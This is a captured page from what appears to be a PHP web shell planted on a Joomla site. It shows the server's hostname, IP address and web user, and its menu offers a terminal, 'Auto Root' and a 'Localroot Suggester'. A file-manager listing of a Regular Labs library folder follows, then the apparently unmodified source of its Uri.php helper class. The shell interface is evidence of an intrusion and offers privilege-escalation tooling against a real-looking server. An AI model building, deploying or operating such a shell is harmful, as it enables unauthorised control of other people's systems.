Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
libraries /
regularlabs /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Api
[ DIR ]
drwxr-xr-x
2026-06-10 18:30
Condition
[ DIR ]
drwxr-xr-x
2026-06-10 18:30
.DS_Store
6
KB
-rw-r--r--
2026-06-10 18:30
ActionLogPlugin.php
6.23
KB
-rw-r--r--
2026-06-10 18:30
Alias.php
3.36
KB
-rw-r--r--
2026-06-10 18:30
ArrayHelper.php
11.17
KB
-rw-r--r--
2026-06-10 18:30
Article.php
11.14
KB
-rw-r--r--
2026-06-10 18:30
Cache.php
2.33
KB
-rw-r--r--
2026-06-10 18:30
CacheNew.php
4.53
KB
-rw-r--r--
2026-06-10 18:30
Condition.php
12.5
KB
-rw-r--r--
2026-06-10 18:30
ConditionContent.php
12.38
KB
-rw-r--r--
2026-06-10 18:30
Conditions.php
23.12
KB
-rw-r--r--
2026-06-10 18:30
DB.php
5.5
KB
-rw-r--r--
2026-06-10 18:30
Database.php
458
B
-rw-r--r--
2026-06-10 18:30
Date.php
4.85
KB
-rw-r--r--
2026-06-10 18:30
Document.php
16.94
KB
-rw-r--r--
2026-06-10 18:30
EditorButton.php
507
B
-rw-r--r--
2026-06-10 18:30
EditorButtonHelper.php
2.56
KB
-rw-r--r--
2026-06-10 18:30
EditorButtonPlugin.php
4.38
KB
-rw-r--r--
2026-06-10 18:30
EditorButtonPopup.php
2.33
KB
-rw-r--r--
2026-06-10 18:30
Extension.php
16.83
KB
-rw-r--r--
2026-06-10 18:30
Field.php
9.6
KB
-rw-r--r--
2026-06-10 18:30
FieldGroup.php
3.52
KB
-rw-r--r--
2026-06-10 18:30
File.php
15.34
KB
-rw-r--r--
2026-06-10 18:30
Form.php
20.14
KB
-rw-r--r--
2026-06-10 18:30
Html.php
23.84
KB
-rw-r--r--
2026-06-10 18:30
HtmlTag.php
5.14
KB
-rw-r--r--
2026-06-10 18:30
Http.php
4.5
KB
-rw-r--r--
2026-06-10 18:30
Image.php
11.21
KB
-rw-r--r--
2026-06-10 18:30
Language.php
1.09
KB
-rw-r--r--
2026-06-10 18:30
License.php
2.01
KB
-rw-r--r--
2026-06-10 18:30
Log.php
3.6
KB
-rw-r--r--
2026-06-10 18:30
MobileDetect.php
83.24
KB
-rw-r--r--
2026-06-10 18:30
ObjectHelper.php
1.52
KB
-rw-r--r--
2026-06-10 18:30
Parameters.php
2.73
KB
-rw-r--r--
2026-06-10 18:30
ParametersNew.php
9.17
KB
-rw-r--r--
2026-06-10 18:30
Plugin.php
775
B
-rw-r--r--
2026-06-10 18:30
PluginTag.php
21.9
KB
-rw-r--r--
2026-06-10 18:30
Protect.php
33.6
KB
-rw-r--r--
2026-06-10 18:30
RegEx.php
6.36
KB
-rw-r--r--
2026-06-10 18:30
ShowOn.php
1.39
KB
-rw-r--r--
2026-06-10 18:30
StringHelper.php
14.49
KB
-rw-r--r--
2026-06-10 18:30
SystemPlugin.php
14.39
KB
-rw-r--r--
2026-06-10 18:30
Title.php
2.85
KB
-rw-r--r--
2026-06-10 18:30
Uri.php
5.79
KB
-rw-r--r--
2026-06-10 18:30
Version.php
10.4
KB
-rw-r--r--
2026-06-10 18:30
Xml.php
1.76
KB
-rw-r--r--
2026-06-10 18:30
Save
Rename
<?php /** * @package Regular Labs Library * @version 23.9.3039 * * @author Peter van Westen <info@regularlabs.com> * @link https://regularlabs.com * @copyright Copyright © 2023 Regular Labs All Rights Reserved * @license GNU General Public License version 2 or later */ namespace RegularLabs\Library; defined('_JEXEC') or die; use Joomla\CMS\Factory as JFactory; use Joomla\CMS\Router\Route as JRoute; use Joomla\CMS\Uri\Uri as JUri; /** * Class Uri * * @package RegularLabs\Library */ class Uri { /** * adds the given url parameter (key + value) to the url or replaces it already exists * * @param string $url * @param string $key * @param string $value * @param bool $replace * * @return string */ public static function addParameter($url, $key, $value = '', $replace = true) { if (empty($key)) { return $url; } $uri = parse_url($url); $query = self::parse_query($uri['query'] ?? ''); if ( ! $replace && isset($query[$key])) { return $url; } $query[$key] = $value; $uri['query'] = http_build_query($query); return self::createUrlFromArray($uri); } /** * Appends the given hash to the url or replaces it if there is already one * * @param string $url * @param string $hash * * @return string */ public static function appendHash($url = '', $hash = '') { if (empty($hash)) { return $url; } $uri = parse_url($url); $uri['fragment'] = $hash; return self::createUrlFromArray($uri); } public static function createCompressedAttributes($string) { $parameters = []; $compressed = base64_encode(gzdeflate($string)); $chunk_length = ceil(strlen($compressed) / 10); $chunks = str_split($compressed, $chunk_length); foreach ($chunks as $i => $chunk) { $parameters[] = 'rlatt_' . $i . '=' . urlencode($chunk); } return implode('&', $parameters); } /** * Converts an array of url parts (like made by parse_url) to a string * * @param array $uri * * @return string */ public static function createUrlFromArray($uri) { $user = $uri['user'] ?? ''; $pass = ! empty($uri['pass']) ? ':' . $uri['pass'] : ''; return (! empty($uri['scheme']) ? $uri['scheme'] . '://' : '') . (($user || $pass) ? $user . $pass . '@' : '') . (! empty($uri['host']) ? $uri['host'] : '') . (! empty($uri['port']) ? ':' . $uri['port'] : '') . (! empty($uri['path']) ? $uri['path'] : '') . (! empty($uri['query']) ? '?' . $uri['query'] : '') . (! empty($uri['fragment']) ? '#' . $uri['fragment'] : ''); } public static function decode($string) { return gzinflate(base64_decode(urldecode($string))); } public static function encode($string) { return urlencode(base64_encode(gzdeflate($string))); } /** * Returns the full uri and optionally adds/replaces the hash * * @param string $hash * * @return string */ public static function get($hash = '') { $url = JUri::getInstance()->toString(); if ($hash == '') { return $url; } return self::appendHash($url, $hash); } public static function getCompressedAttributes() { $input = JFactory::getApplication()->input; $compressed = ''; for ($i = 0; $i < 10; $i++) { $compressed .= $input->getString('rlatt_' . $i, ''); } return gzinflate(base64_decode($compressed)); } public static function isExternal($url) { if (strpos($url, '://') === false) { return false; } // hostname: give preference to SERVER_NAME, because this includes subdomains $hostname = ($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : $_SERVER['HTTP_HOST']; return ! (strpos(RegEx::replace('^.*?://', '', $url), $hostname) === 0); } /** * removes the given url parameter from the url * * @param string $url * @param string $key * * @return string */ public static function removeParameter($url, $key) { if (empty($key)) { return $url; } $uri = parse_url($url); if ( ! isset($uri['query'])) { return $url; } $query = self::parse_query($uri['query']); unset($query[$key]); $uri['query'] = http_build_query($query); return self::createUrlFromArray($uri); } public static function route($url) { return JRoute::_(JUri::root(true) . '/' . $url); } /** * Parse a query string into an associative array. * * @param string $string * * @return array */ private static function parse_query($string) { $result = []; if ($string === '') { return $result; } $decoder = fn($value) => rawurldecode(str_replace('+', ' ', $value)); foreach (explode('&', $string) as $kvp) { $parts = explode('=', $kvp, 2); $key = $decoder($parts[0]); $value = isset($parts[1]) ? $decoder($parts[1]) : null; if ( ! isset($result[$key])) { $result[$key] = $value; continue; } if ( ! is_array($result[$key])) { $result[$key] = [$result[$key]]; } $result[$key][] = $value; } return $result; } }